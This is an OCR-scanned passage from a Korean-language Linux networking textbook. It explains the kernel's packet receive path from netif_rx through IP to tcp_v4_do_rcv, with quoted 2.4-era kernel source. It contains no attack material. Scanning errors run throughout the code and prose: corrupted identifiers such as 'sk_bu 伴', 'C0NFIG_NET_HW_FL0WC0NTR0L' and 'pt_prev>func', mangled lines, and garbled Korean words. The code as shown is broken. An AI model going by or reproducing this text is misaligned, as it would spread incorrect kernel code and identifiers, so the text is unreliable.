netdev_rx_stat[this_cpu].total ++； 

if (queue - >input_pkt_queue.qlen <= netdev_max_backlog) { 
if (queue ->input_pkt_queue.qlen) { 
if (queue ->throttle) 
goto drop; 
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enqueue- 

dev_hold(skb->dev); 

— skb_queue_tail(&queue - >input_pkt_queue,skb )； 
_cpu_raise_softirq(this_cpu, NET_RX_SOFTIRQ )； 
local_irq_restore(flags); 

#ifndef OFFLINE_SAMPLE 
get_sample_stats(this_cpu )； 

#endif 

return softnet_data[this_cpu] .cng_level ； 

} 

if (queue ->throttle) { 
queue->throttle = 0 ； 

#ifdef CONFIG_NET_HW_FLOWCONTROL 
if (atomic_dec_and_test(&netdev_dropping)) 
netdev_wakeupOj 
#endif 

} 

goto enqueue ； 

} 

if (queue ->throttle == 0) { 
queue->throttle = 1 ； 
netdev_rx_stat[this_cpu].throttled ++； 

#ifdef C0NFIG_NET_HW_FL0WC0NTR0L 
atomic_inc(&netdev_dropping )； 

#endif 

} 

drop: 

netdev_rx_stat[this_cpu].dropped ++； 

local_irq_restore(flags )； 

kfree_skb(skb )； 

return NET_RX_DROP ； 


netif_rx() 함수는 망장치구동기에서 호출되며 웃층의 규약(례를 들어 IP 나 ARP) 에 파 
케 트가 들어 왔음을 통지한다 . 먼저 함수에 서 사용하게 될 지 역변수들에 대 한 초기 화와 
sk_bu 伴의 timestamp 값을 설 정 한다 (get_fast_time()). 받은 파케 트들을 저 장할 각각의 
CPU 에 배정된 대기 렬완충기를 찾는다 (softnet_data[this_cpu]). 다음 새 치기 가 발생 하지 
못하도록 만들고 (local_irq_save()) 망을 통해서 받은 파케트의 개수를 증가시킨다 . 

받은 파케 트를 해 당한 CPU 의 대 기 렬 에 집 어 넣 는 과정 이 다 . 최 대 망장치 의 backlog 
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수보다 현재 가지고있는 파케트 대기렬의 길 이가 작다면 대기렬에 집 어넣도륵 한다 . 이때 
혼잡조종 (congestion control) 을 하고있 다면 파케 트를 버 린 다 . 

받은 파케 트 (sk_buff) 를 해 당한 대 기 렬 에 집 어 넣 는것 은 _ skb_queue_tail() 이 다 . 그다 
음 해 당한 CPU 에서 망파케트를 처 리하도록 쏘프트웨 어새 치기를 발생시킨 
다 . ( — cpu_raise_softirq ()) 

여기서 간단히 파케트의 queue 구조체를 보도록 하자 . 


코드 29. softnet_data 구조체의 정의 


struct softnet_data 

{ 

int throttle ； / * Throttle 값 : congestion 
control */ 

int cng_level ； /* Backlog congestion 의 level */ 
int avg_blog ； / * 평균적 인 backlog 의 길이 */ 

struct sk_buff_head input_pkt_queue ； /* Input packet q ueue */ 
struct net_device *output_queue ； /* Output device 를 가르 
키는 지적자 */ 

struct sk_bu 伴 *completion_queue ； / * 처리가 완료된 sk_bu 伴의 큐 
*/ 

} 一 attribute— ( ( 一 aligned 一 (SMP_CACHE_BYTES))) ; 


_ skb_queue_tail() 함수는 받은 파케트를 input_pkt_queue 에 집어넣게 되며 만약 대 
기 중인 파케 트대 기 렬 의 길 이 가 backlog 의 최 대 길 이 보다 크게 될 경 우에 는 대 기 렬 의 throttle 
값을 설 정한다 . 

그러면 쏘프트웨 어새 치 기를 설정 해놓았기때 문에 적절한 처 리는 쏘프트웨 어새 치 기를 보 
면 알수 있다 . _ cpu_raise_softirq() 함수는 아래와 같이 정의된다 . 〜 /include/interrupt.h 
를 참조하였다 . 


코드 30. — cpu_raise_softirq() 함수 
Static inline void — cpu_raise_softirq (int cpu, int nr) 
{ 

softirq_active(cpu) 卜 (l<<nr) ； 


우의 함수는 현재 CPU 에 해 당하는 쏘프트웨 어 IRQ 가 발생 했 다고 표시 만하고 복귀한 
다 . 나중에 쏘프트웨 어새 치 기를 처 리 하는 do_softirq() 함수가 호출될 때 NET_RX_SOTTIRQ 
가 처리된다 . 이때 do_softirq() 함수는 NET_RX_SOFTIRQ 와 관련된 action 함 
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할것 이 다 . 파케 트를 받을 때 호줄되 는 action 함수는 net_i*x_action() 함수이 다 . 이 함수는 
~/net/mre/dev.c 를 참조하였다 . 


코드 31. net_rx_action () 함수 

static void net_rx_action(struct softirq_action *h) 

{ 

int this_cpu = smp_processor_id ()； 
struct softnet_data *queue = &softnet_data[this _cpu] ； 
unsigned long start_time = jiffies ； 
int bugdet = netdev_max_backlog ； 

//. ® 

br_read_lock(BR_NETPROTO_LOCK )； 
for (；；) { 

struct sk_bu 伴 *skb ； 
struct net_device *rx_dev; 
local_irq_disable ()； 

skb = — skb_dequeue(&queue->input_pkt_queue )； 
local_irq_enable ()； 
if (skb == NULL) 
break ； 

skb_bond(skb); 
rx_dev = skb- 〉 dev; 

#ifdef CONFIG_NET_FASTROUTE 

if (skb->pkt_type == PACKET_FASTROUTE) { 

netdev_rx_stat [this_cpu] .fastroute_deferred_out ++； 
dev_queue_xmit(skb) ； 
dev_put(rx_dev) ； 
continue ； 

} 

#endif 

//.(D 

skb- 〉 h.raw = skb- 〉 nh.raw = skb->data ； 


struct packet_type *ptype, *pt_prev ； 
unsigned short type = skb- 〉 protocol; 
pt_prev = NULL ； 

for (ptype = ptype_all ； ptype ； ptype = ptype->next) { 
if (!ptype->dev | | ptype->dev == skb->dev) { 
if (pt_prev) { 

if (!pt_prev->data) { 

deliver_to_old_ones(pt_prev, skb, 0); 

} else { 

atomic_inc(&skb->users )； 
pt_prev->func(skb, skb ->dev, pt_prev )； 
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pt_prev = ptype ； 


#ifdef CONFIG_NET_DIVERT 

if (skb->dev->divert && skb ->dev->divert->divert) 
handle_diverter(skb )； 

#endif/* CONFIG_NET_DIVERT */ 

#if defmed(CONFIG_BRIDGE) | | defmed(CONFIG_BRIDGE_MODULE) 
if (skb->dev->br_port != NULL && 
br_handle_frame_hook != NULL) { 
handle_bridge(skb ? pt_prev )； 
dev_put(rx_dev )； 
continue ； 


#endif 

for (ptype=ptype_base[ntohs(type)&15] ； ptype ； ptype=ptype->next) { 

if (ptype->type == type && (!ptype->dev | | ptype->dev == skb ->dev)) { 
if (pt_prev) { 

if (!pt_prev->data) 

deliver_to_old_ones(pt_prev, skb, 0); 
else { 

atomic_inc(&skb->users )； 
pt_prev->func(skb, skb ->dev, pt_prev )； 


pt_prev = ptype; 


if (pt_prev) { 

if (!pt_prev->data) 

deliver_to_old_ones(pt_prev, skb, l )； 
else 

pt_prev>func(skb, skb->dev, pt_prev )； 

} else 

kfree_skb(skb )； 


dev_put(rx_dev )； 

if (bugdet-- < 0 | | jiffies - start_time > 1) 
goto softnet_break ； 

#ifdef CONFIG_NET_HW_FLOWCONTROL 

if (queue ->throttle && queue - >input_pkt_queue.qlen < no_cong_thre 
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if (atomic_dec_and_test(&netdev_dropping)) { 
queue->throttle = 0 ； 
netdev_wakeup 0; 
goto softnet_break; 


#endif 

} 

br_read_unlock(BR_NETPROTO_LOCK )； 
local_irq_disable 0; 
if (queue ->throttle) { 
queue->throttle = 0; 

#ifdef C0NFIG_NET_HW_FL0WC0NTR0L 
if (atomic_dec_and_test(&netdev_dropping)) 
netdev_wakeup05 
#endif 

} 

local_irq_enable ()； 

NET_PROFILE_LEAVE(softnet_process )； 

return ； 

softnet_break: 

br_read_unlock(BR_NETPROTO_LOCK )； 
local_irq_disable 0; 

netdev_rx_stat[this_cpu].time_squeeze ++； 

_cpu_raise_softirq(this_cpu, NET_RX_SOFTIRQ )； 
local_irq_enableO; 

NET_PROFILE_LEAVE(softnet_process )； 

return ； 


① 현재의 CPU 의 ID 와 입구대기렬에 대 한 지적 자 (queue) 를 구한다 . 그다음 처 리되 
는 시 점 (jiffies) 및 망장치 의 최 대 backlog 의 크기 를 얻는다 . 

② 일단 처리하기 위 해서 금지 (lock) 를 설정 한다 . (br_read_lock()) 그다음 무한순환 
을 돌면서 input_pkt_queue 로부터 하나씩 자료파케 트를 가져 와서 처 리 하게 된 다 . 파케 트 
를 얻 는것 은 _ skb_dequeue() 함수이 다 . 만약 더 이 상 처 리 하려 는 파케 트가 없 다면 순환고 
리 에서 탈퇴한다 . 또한 sk_bu 伴구조체 로부터 파케 트가 올라온 장치 를 얻는다 . 

③ 소케 트완충기 의 머 리 부를 가리키 는 지 적자를 sk_buff 의 자료지적 자로 초기 화해 주 
고 소케 트완충기 에서 통신규약정 보를 가져 온다 . (skb_ 〉 protocol) 이 정 보가 받은 파케 트의 
류형 을 결정 해 준다 . 파케 트의 류형 에 따라서 조종값을 얻 기 위 해 packet_type 이 라는 구 

공의되여있다 . 
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이것은 시 include/Linux/net device, h 에 정의 되여 있 다 . 


코드 32. packet_type 구조체의 정의 
struct packet_type 
{ 

unsigned short type ； /* packet 의 type */ 
struct net_device *dev; /* 망장치구동기구조체 지적자 */ 
int (*func) (struct sk_bu 伴 *，struct net_device *， 
struct packet_type *); /* 파케 트류형 에 따른 조종함수 */ 
void *data; /* 파케트류형의 고유한 자료들에 대한 지적자 
*/ 


struct packet_type *next; /* 파케 트류형 목록 */ 


전체 파케 트류형 에 대 한 목록은 ptype_all 로 설정한다 . 만일 등록된 파케 트류형 에 대 
해서 장치구동기 가 NULL 이거 나 packet_type 의 device 마당이 sk_bu 伴의 device 마당과 같 
다면 다시 pt_prev 가 NULL 이 아닌지를 확인하고 packet_ type 의 data 마당을 고찰한다 . 
NULL 이 라면 deliver_to_old_ones() 가 호출되 고 그렇지 않다면 pt_prev—>func() 함수가 호 
출된다 . 그리고 무한순환을 돌면서 모든 파케트류형을 계속 고찰한다 . 

④ CONFIG_NET_DIVERT 와 CONFIG_BRIDGE 가 설정되였다면 해당한 처리를 하 
며 파케 트류형 에 따라 차례 로 처 리 하기 위한 for loop 를 실 행하게 된 다 . 우에 서 for loop 
를 실행하는것 은 이써네 트파케 트류형 이 ETH_P_ALL 로 설정된 경 우이 고 여 기서 고찰하는 
것은 그외의 파케트류형에 대한 처리 이다 . 

⑤ 이 부분에서 는 파케 트에 대 한 처 리 보다 흐름조종 (flow control ) 기 능을 담당한다 . 그 
것은 너무 많은 파케트가 들어오는 경우에 망의 혼잡성이 커지므로 이것을 방지하기 위해 
서이다 . 

이 상에서 대 략적 으로 망과 관련된 bottom half 에 대 해서 살펴보았다 . 결과적 으로 등 
륵된 파케트류형에 해당하는 조종 (handler ) 함수가 소케트완충기에 대해서 호출된다 . 

— IP 층 

우리가 지금 론의하고있는것은 TCP/IP 로 제한되여있기때문에 IP 층에 있는 파케트류 
형조종자가 호출될것 이 다 . IP 파케트조종자의 등록은 IP 모둘을 초기화하면서 진행된다 . 이 
것을 코드 33 에서 보여주었는데 〜 /net/ipv4/ip_output.c 를 참조하였다 . 


鍾變邊 錢變變©繼鹽 







Lirnix 당보안 


코드 33. IP 층의 초기화 
/* 

* IP protocol layer initialiser 
*/ 


static struct packet_type ip_packet_type = 

{ ᅪ 시 

— constant_htons (ETH_P_IP ) ， 

NULL, /* All devices *7 
ip_rcv, 

(void*)1, 

NULL, 


* IP registers the packet type and then calls the subprotocol initialisers 
*/ 


void — init ip_init (void) 

{ 

dev_add_pack (&ip_packet_type) ； 
ip_rt_init () ； 
inet_initpeers() ； 

#ifdef CONFIG_IP_MULTICAST 

proc_net_create ( M igmp ” ， 0 ， ip_mc_procinfo) ； 
#endif 


즉 ~/net/core/dev.c 에 정의된 dev_add_pack () 함수를 호출하면서 등록한다 . 파케트 
류형으로는 ETH_P_IP, 조종자함수는 ip_rcv 를 준다 . 따라서 net_rx_action() 에서는 
ip_rcv() 함수가 호출된다 . 

ip_rcv () 함수를 보자 . 이것은 ~/net/ipv4/ip_input.c 에 정의되 여있다 . 


코드 34. ip_rcv () 함수의 정의 

int ip_rcv(struct sk_bu 伴 *skb, struct net_device *dev, struct packet_type *pt) 
{ " 
struct iphdr *iph = skb~>nh. iph ； 
if (skb->pkt_type == PACKET_OTHERHOST) 
goto drop ； 

IP_INC_STATS_BH (IpInReceives); 

if Uskb = skb_share_check(skb, GFP_ATOMIC)) == NULL) 
goto out ； 


寒 


錢變邊 鍾變變©繼繼 








게 3 광. LINUX 에째 땅보冬到 나련요소 


if (skb->len < sizeof(struct iphdr) | | skb - >len < (iph_ 〉 ihl<<2)) 
goto inhdr_error ； 

if (iph->ihl < 5 | | iph->version != 4 | | ip_fast_csum((u8 *)iph, iph~>ihl) != 0) 
goto inhdr_error ； 

{ ᄂ 

— u32 len = ntohs (iph->tot_len) ； 
if (skb_〉len < len | | len < (iph->ihl«2)) 
goto inhdr_error ； 

— skb_trim (skb, len) ； 

} 

return NF_HOOK(PF_INET, NF_IP_PRE_ROUTING, skb, dev, NULL, 
ip_rcv_finish) ； 
inhdr_error : 

IP_INC_STATS_BH (IpInHdrErrors); 
drop ： 

kfree_skb (skb) ； 
out: 

return NET_RX_DROP ； 


이 함수가 하는 역할은 받은 파케트가 정확한지를 확인하는것이다. 먼저 최소한 IP 
머리부를 가지고있는가와 IP 판본이 4인지，검사합은 정확한지 그리고 실제적인 길이를 가 
지는 자료인지를 확인한다. 만약 받은 파케트가 다른 호스트로 가는 파케트라면 거부한다. 
이 경우에는 망하드웨 어가 promiscuous 방식으로 동작할것 이 다. 이때 망상에서 흐르는 모 
든 파케 트가 다 접 수된 다. 그다음 통계 적 인 정 보를 갱 신 ( update ) 하게 되 며 소케 트완충기 
의 머리 부를 새로 할당받아서 복사한다(8낸_811크고6_(土6신^0). 이때도 오유가 있다면 해당 
한 파케트를 처 리하지 않고 복귀한다. 다음은 파케트의 길 이와 IP 의 판번호，검사합을 처 
리하는 부분이다. 오유가 있다면 오유통계를 내고 파케트를 버 리고 복귀한다. 마지막으로 
다시 netfilter 의 처 리를 하게 되는데 이부분에 대 해서는 다음절에서 론의 하기 로 하고 
ip _ rcv _ finish () 함수가 바로 호출된다고 보자. 


코드 35. ip _ rcv _ finish () 함수 

static inline int ip_rcv_finish (struct sk_buff *skb) 

{ 

struct net_device *dev = skb ->dev ； 
struct iphdr *iph = skb~>nh. iph ； 
if (skb-〉dst == NULL) { 

if (ip_route_input(skb, iph~>daddr, iph~>saddr, iph~>tos, dev)) 
goto drop ； 
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■ef CONFIG_NET_CLS_ROUTE 
if (skb->dst->tclassid) { 

struct ip_rt_acct *st = ip_rt_acct + 256*smp_processor_id() ； 

u32 idx = skb->dst->tclassid ； 

st [idx&OxFF]. o_packets++ ； 

st [idx&OxFF]. o_bytes+=skb - >len ； 

st [ (idx>> 16) &OxFF]. i_packets++ ； 

st [ (idx>> 16) &OxFF]. i_bytes+=skb - >len ； 

} ' 

#endif 

if (iph_〉ihl > 5) { 

struct ip_options *opt ； 

skb = skb_cow(skb, skb_headroom(skb)) ； 

if (skb == NULL) 

return NET_RX_DROP ； 
iph = skb~>nh. iph ； 
skb->ip_summed = 0; 
if (ip_options_compile(NULL, skb)) 
goto inhdr_error ； 
opt = & (IPCB (skb) - >opt) ； 
if (opt_ 〉 srr) { 

struct in_device *in_dev = in_dev_get(dev) ； 
if (in_dev) { 

if (! IN_DEV_SOURCE_ROUTE (in_dev)) { 

if (IN_DEV_LOG_MARTIANS (in_dev) && net_ratelimit()) 
printk(KERN_INFO ’’source route 

option %u. %u. %u. %u -> %u. %u. %u. %u\n M , 

NIPQUAD (iph- 〉 saddr), NIPQUAD (iph_ 〉 daddr)) ； 
in_dev_put (in_dev) ； 
goto drop ； 

} 

in_dev_put (in_dev); 

} _ 

if (ip_options_rcv_srr (skb)) 

goto drop ； 


return skb- 〉 dst- 〉 input(skb); 
inhdr_error : 

IP_INC_STATS_BH (IpInHdrErrors); 
drop: 

kfree_skb (skb) ； 
return NET_RX_DROP ； 


166 


② 
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① ip_rcv_finish() 함수의 기능은 경로조종표를 확인하고 등록된 input 함수를 다시 호 
출하는것 이 다 . 

먼저 skb -〉dst 가 NULL 값을 가지는지 확인한다 . NULL 값을 가진다면 
ip_route_input() 함수를 호출하여 경로조종표를 갱신하고 multicasting 에 대한 처리를 한다 . 
또한 CONFIG_NET_CLS_ROUTE 가 설정되였다면 관련된 accounting 정보를 갱신한다 . 

② IP 의 머 리부의 길이가 5 이상이 라면 sk_buff 에 대해서 IP 머 리부할당을 위한 적절 
한 공간이 있는지 확인하고 (skb_mw()) 그것이 없다면 NET_RX_DROP 를 돌려준다 . 또 
한 IP 머 리 부의 정 보를 구하고 IP 검 사합을 sk_bu 伴구조체 에 0 으로 설정한다 . 다음 IP 의 옵 
션을 확인하고 새로운 IP 머 리부의 정보를 그 옵션에 맞게 구성한다 ( 士 _0 배이 18_ 이 111 하 16 0). 

만약 IP 의 옵션이 원천경 로조종 (Source routing) 이 라면 해 당한 처 리를 하고 마지 막 
으로 skb- 〉 dst- 〉 input() 함수를 호출한다 . 오유가 발생한다면 해당한 처리를 하고 
NET_RX_DROP 를 돌려주고 복귀한다 . 

skb->dst->input () 함수의 지 적 자는 local 일 경 우에 ip_local_deliver () 로 설 정 되 며 
(ip_route_input() 함수의 내부에서 ) 아래와 같다 . 

이것은 ~/net/ipv4/ip_input.c 를 참조하였다 . 


코드 36. ip_local_deliverO 함수 

int ip_local_deliver (struct sk_bu 伴 *skb) 

{ 

struct iphdr *iph = skb->nh. iph ； 
if (iph->frag_off & htons (IP_MF | IP_OFFSET)) { 
skb = ip_defrag(skb) ； 
if (!skb) 
return 0 ； 

} 

return NF_HOOK(PF_INET, NF_IP_LOCAL_IN, skb, skb ->dev, NULL, 
ip_local_deliver_finish) ； 


이 함수의 역 할은 조각화된 IP 파케 트의 재 조립 (reassembly) 을 하는것 이 며 
(ip_defrag()) 끝나게 되면 ip_local_deliver_fimsh() 함수를 호출한다 . 이 함수 역시 
시 net/ipv4 / ip_input. c 에 정 의 되 여 있 다 . 
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코드 37.ip_local_deliver_finish() 함수 

static inline int ip_local_deliver_finish(struct sk_bu 伴 *skb) 

{ 

struct iphdr *iph = skb->nh.iph ； 

#ifdef CONFIG_NETFILTER_DEBUG 
nf_debug_ip_local_deliver(skb )； 

#endif /^CONFfG_NETFILTER_DEBUG^/ 

/* Point into the IP datagram, just past the header. */ 
skb ->h.raw = skb ->nh.raw + iph- 〉 ihl*4; 

// . ® 

{ 

/* Note- See raw.c and net/raw.h, 

RAWV4_HTABLE_SIZE==MAX_INET_PROTOS */ 
int hash = iph->protocol & (MAX_INET_PROTOS - 1); 
struct sock *mw_sk = raw_v4_htable [hash] ； 
struct inet_protocol *ipprot; 
int flag ； 

if(raw_sk != NULL) 

raw_sk = raw_v4_input(skb, iph ， hash )； 
ipprot = (struct inet_protocol *) inet_protos[hash] ； 
flag = 0 ； 

if(ipprot != NULL) { 

if(raw_sk == NULL && ipprot->next == NULL && 
ipprot->protocol == iph->protocol) { 
int ret ； 

/* Fast path... */ 

ret = ipprot->handler(skb, (ntohs(iph->tot_len) - 
(iph->ihl * 4))); 
return ret ； 

} else { 

flag = ip_rim_ipprot(skb ， iph, ipprot, (raw_sk != NULL ))； 

} 

} 

//.(D 

if(raw_sk != NULL) {/* Shift to last raw user */ 
raw_rcv(raw_sk, skb )； 
sock_put(raw_sk) ； 

} else if (!flag) {/* Free and report errors */ 
icmp_send(skb, ICMP_DEST_UNREACH, 
ICMP_PROT_UNREACH ? 0); 
kfree_skb(skb )； 


return 0 ； 
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① 넘 겨 받은 sk_buff 로부터 IP 머 리 부에 대 한 지 적 자를 구하자 . 이 지 적 자를 기 준으로 
해서 해 당한 웃증의 규약을 찾는다 . 

② RAW 소케트옵션이 있는지를 확인하고 해 당한 처 리를 진행 한다 (raw_v4_input()). 
결과 하쉬색인값 즉 보내려고 하는 자료를 얻을수 있다 . 이것은 TCP 의 경우 자신의 머 
리부 첫부분이 될것 이다 . 

다음 inet_protocol 구조체의 배 렬로부터 해 당한 규약에 대 한 값을 얻 어서 이것 을 ipprot 
에 설정 한다 . 만약 ipprot 가 NULL 이 아니 라면 해 당한 규약번호와 일 치 하는 조종자를 호 
줄하게 된다 . 

ip_run_ipprot() 함수 역시 해 당한 규약을 찾아서 조종자를 호출하는 역할을 한다 . 

③ RAW 소케트에 대한 처리를 하고 만일 RAW 소케트도 아니고 쪼각화비트 
(fragmentation ) 도 설정되지 않았다면 ICMP 통보를 만들어서 보내고 소케트완충기를 해 
방한다 (release). 

여기서 inet_protoc 이구조체를 고찰하자 . 이것은 IP 층에서 지원하는 웃층의 규약에 대 
한 정보를 가지 고 초기화된다 . 이것은 〜 /include/net/protocol.h 에 정의되 여 있다 . 


코드 38. inet_protoc 이 구조체의 정의 
struct inet_protocol 
{ 

int (*handler) (struct sk_bu 伴 *skb，unsigned short len) ； 
void (*err_handler) (struct sk_bu 伴 *skb，unsigned char *dp ， 
int len) ； 

struct inet_protocol *next ； 
unsigned char protocol ； 
unsigned char copy : 1 ； 
void *data ； 
const char *name ； 


inet_protoc 이구조체 는 웃층의 규약조종자 및 오유조종자，규약번호，복사기 발，사용 
되는 자료，규약의 이름으로 구성된다 . TCP 와 UDP 에 대한 inet_protoc 이구조체는 아래 
와 같이 정의된다 . 


코드 39. TCP 와 UDP 에 대한 inet_protoc 이 구조체의 정의 
static struct inet_protocol tcp_protocol = 

{ ᅪ 

tcp_v4_rcv, /* TCP handler */ 
tcp_v4_err, /* TCP error control */ 
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IPPROTO_PREVIOUS ， 
IPPROTO_TCP, /* protocol ID */ 
0, /* copy */ 

NULL, /* data */ 

’’TCP” /* name */ 


static struct inet_protocol udp_protocol = 
{ ᅳ ᅳ 
udp_rcv, /* UDP handler */ 
udp_err, /* UDP error control */ 
IPPROTO.PREVIOUS, /* next */ 
IPPROTO_UDP, /* protocol ID */ 

0, /* copy */ 

NULL, /* data */ 

M UDP M /* name */ 


이 렇 게 정 의 된 inet_protocal 구조체 들은 각각 지 적 자로 서 로 련결되 여 있 다 . IP 층에 서 
는 해 당한 규약의 조종자를 호출하는 역 할만 하고 나머지는 해 당 규약이 담당한다 . 현재 고 
찰하는것 은 TCP 층에 해 당한것 이 므로 tcp_v4_rcv() 조종자함수까지 올라오게 되 였 다 . 

— TCP/IP 층 

TCP/UDP 에서는 IP 층으로부터 sk_buff 형태로 완충기를 넘겨받아서 통신규약에 관련 
된 연산을 처 리 한 후 다시 상위 (INET 층 ) 층으로 자료를 전송한다 . 

tcp_v4_rcv() 함수를 보자 . 이 함수는 ~/net/ipv4/tcp_ipv4.c 에 정의되여 있다 . 


코드 40. tcp_v4_rcv() 함수 

int tcp_v4_rcv(struct sk_bu 伴 *skb, unsigned short len) 

{ 

struct tcphdr *th; 
struct sock *sk ； 
int ret ； 

if (skb->pkt_type!=PACKET_HOST) 
goto discard_it ； 
th = skb- 〉 h.th; 


/* Pull up the IP header. */ 

— skb_pull(skb, skb- 〉 h.raw - skb->data )； 
/* Count it even if it’s bad */ 
TCP_INC_STATS_BH(TcpInSegs )； 

/> ① 


i 7 a 
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if (th - 〉do 伴 < sizeof(struct tcphdr)/4 | | 

(skb ->ip_summed != CHECKSUM-UNNECESSARY && 
tcp_v4_checksum_init(skb) < 0)) 
goto bad_packet ； 

TCP_SKB_CB(skb)->seq = ntohl(th->seq )； 

TCP_SKB_CB(skb)->end_seq = (TCP_SKB_CB(skb)->seq + th->syn + 
th->fin + len - th->doff*4 )； 

TCP_SKB_CB(skb)->ack_seq = ntohl(th->ack_seq )； 

TCP_SKB_CB(s 此)-〉 when = 0 ； 

TCP_SKB_CB(skb)->flags = skb ->nh.iph->tos ； 
TCP_SKB_CB(skb)->sacked = 0 ； 
skb->used = 0 ； 

sk = — tcp_v4_lookup(skb - 〉 nh.iph- 〉 saddr, th->source, 
skb ->nh.iph->daddr, ntohs(th->dest), tcp_v4_iif(skb ))； 
if (!sk) 

goto no_tcp_socket; 
process- 

if(!IPsec_sk_policy(sk,skb)) 
goto discard_and_relse ； 
if (sk-〉state == TCP_TIME_WAIT) 
goto do_time_wait; 
skb-〉dev = NULL ； 
bh_lock_sock(sk); 
rot — 0; 

if (!sk->lock.users) { 

if (!tcp_prequeue(sk ? skb)) 

ret = tcp_v4_do_rcv(sk, skb); 

} else 

sk_add_backlog(sk, skb )； 
bh_unlock_sock(sk) ； 
sock_put(sk )； 
return ret ； 

//.(D 

no_tcp_socket- 

if (len < (th-〉do 伴 <<2) | | tcp_checksum_complete(skb)) { 
bad_packet- 

TCP_INC_STATS_BH(TcpInErrs )； 

} else { 

tcp_v4_send_reset(skb )； 

} 

discard_it- 

/* Discard frame. */ 
kfree_skb(skb )； 
return 0; 

discar d_and_r else- 
sock_put(sk )； 
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goto discard_it; 
do_time_wait- 

if (len < (th-〉do 伴 <<2) | | tcp_checksum_complete(skb)) { 
TCP_INC_STATS_BH(TcpInErrs )； 
goto discard_and_relse ； 

} 

switch(tcp_timewait_state_process((struct tcp_tw_bucket *)sk, 
skb, th, skb->len)) { 
case TCP_TW_SYN ： 

{ 

struct sock *sk2 ； 

sk2 = tcp_v4_lookup_listener(skb ->nh.iph->daddr ? ntohs(th- 〉 dest), 
tcp_v4_iif(skb)); 
if (sk2 != NULL) { 

tcp_tw_deschedule((struct tcp_tw_bucket *)sk); 
tcp_timewait_kill((struct tcp_tw_bucket *)sk); 
tcp_tw_put((struct tcp_tw_bucket *)sk); 
sk = sk2 ； 
goto process ； 

} 

/* Fall through to ACK */ 

} 

case TCP_TW_ACK ： 

tcp_v4_timewait_ack(sk, skb); 
break ； 

case TCP_TW_RST ： 
goto no_tcp_socket ； 
case TCP_TW_SUCCESS ：； 

} 

goto discard_it; 


① 넘겨받은 파케트의 목적지가 자신의 호스트인가를 확인하고 TCP 머리부의 위치를 
얻 는다 . 

여기서는 IP 머리부에 대한 정보가 필요없기때문에 버리게 된다 (_skb_pull()). 그리 
고 account 정보를 갱 신한다 . 

② 파케 트가 정 확한가를 확인하고 sk_bu 伴구조체 의 TCP 를 위한 조종블로크 (cxmtrol 
block) 를 sk_bu 伴에 있는 내 용으로 채 운다 . 그리 고 원천지 (source) 와 목적지 (destination) 
의 주소를 가지 고 해 당하는 INET sock 구조체 가 련결 (established) 상태 에 있거 나 혹은 련 
결대기 (listen) 상태에 있는가를 찾는다 . 이미 련결되여 있다고 가정 하였기때문에 INETsock 
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찾았다면 이 것 을 가지 고 소케 트의 보안상태 를 검 사하여 적 절 한 처 리 를 진행 한다 . INET 
sock 구조체에 대해서 열쇠를 걸고 (lock) 사용자가 있 는지 확인 한다 . 만약 없다면 
tcp_prequeue() 함수를 호출하여 현재 사용자프로쎄스로 복사할수 있는가를 확인한다 . 그 
렇지 않다면 tcp_v4_do_rcv() 함수를 호출하게 되며 lock 된 사용자가 있다면 backlog 에 
sk_bu 伴를 넣 어 준다 (sk_add_backlog()). 이 젠 INET 소케 트에 대 한 lock 를 해제 하고 INET 
소케 트에 대 한 reference count 를 감소시 킨 후 (sock_put()) 복귀 한다 . 

③ 오유를 처 리 하고 할당된 sk_buff 구조체 를 해 제 하는 부분이 다 . do_time_wait 로 조 
종이 넘 어 가게 되면 SYN 및 ACK 와 RST 에 대 한 처 리를 진행 하며 마지막으로 다시 sk_bu 伴 
구조체 를 해 제 한다 . 

다음 tcp_v4_do_rcv() 함수를 고찰하자 . 이 함수는 ~/net/ipv4/tcp_ipv4.c 에 정의되 여 있 
다 . 이 함수는 INET 소케 트의 상태 에 따라서 달리 처 리한다 . 즉 련결 (established) 되 여있는 
지 아니 면 련결대 기 (listen) 상태 인지를 확인하게 된다 . 


코드 41. tcp_v4_do_rcv() 함수 

int tcp_v4_do_rcv(struct sock *sk，struct sk_buff *skb) 

{ 

#ifdef CONFIG_FILTER 

struct sk_filter ^filter = sk->filter ； 
if (filter && sk_filter(skb, filter)) 
goto discard ； 

#endif/* CONFIG_FILTER */ 

IP_INC_STATS_BH(IpInDelivers )； 
if (sk->state == TCP_ESTABLISHED) {/* Fast path */ 
TCP_CHECK_TIMER(sk )； 

if (tcp_rcv_established(sk, skb, skb->h.th, skb->len)) 
goto reset ； 

TCP_CHECK_TIMER(sk )； 
return 0; 

} 

if (skb->len < (skb->h.th->doff«2) | | tcp_checksum_complete(skb)) 
goto csum_err ； 

if (sk->state == TCP_LISTEN) { 

struct sock *nsk = tcp_v4_hnd_req(sk, skb )； 
if (!nsk) 

goto discard ； 
if (nsk != sk) { 

if (tcp_child_process(sk ? nsk, skb)) 
goto reset ； 
return 0; 


TCP CHECK TIMER(sk )； 
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if (tcp_rcv_state_process(sk, skb ， skb- 〉 h.th，skb ->len)) 
goto reset ； 

TCP_CHECK_TIMER(sk )； 
return 0; 
reset- 

tcp_v4_send_reset(skb )； 

//. ® 

discard: 

kfree_skb(skb )； 

/* Be careful here. If this function gets more complicated and 

* gcc suffers from register pressure on the x86, sk (in %ebx) 

* might be destroyed here. This current version compiles correctly, 

* but you have been warned. 

*/ ' 

return 0; 
csum_err: 

TCP_INC_STATS_BH(TcpInErrs )； 
goto discard; 

} ᄂ 

//. (D 


① netfilter 옵션 이 설 정되 여 있 다면 파케트에 대 한 려 과를 진행 하며 IP 의 account 정보 
를 갱 신한다 (IpInDelivers). 만일 INET 소케트의 상태 가 TCP_ESTABLISHED 라면 INET 
소케트의 TCP 와 관련된 timer 를 갱신하고 tcp_rcv_established() 함수를 호출한 다음 복 
귀 한다 . 파케 트의 길 이 나 TCP 검 사합에 문제 가 있 다면 오유처 리 로 넘 어 가게 되 며 만일 INET 
소케트가 TCP_LISTEN 상태에 있었다면 tcp_v4_hnd_req() 함수를 호출하여 조종을 넘겨 
준 다 . 

tcp_v4_hnd_req() 함수는 의 뢰 기 (client) 로부터 connect 요구와 같은것 을 처 리 한다 . 이 
경우 listen 상태에 있는 INET 소케트을 찾아서 해당한 INET 소케트구조체를 얻는다 . 만일 
얻지 못했다면 sk_bu 伴를 버리고 복귀하며 얻은 INET 소케트가 현재 처리요구중인 INET 
소케트와 다른 경우에는 tcp_child_process() 를 호출한다 . 

tcp_child_process() 함수는 ESTABLISH 나 TIME_WAIT 상태 가 아닌 child INET 소케 
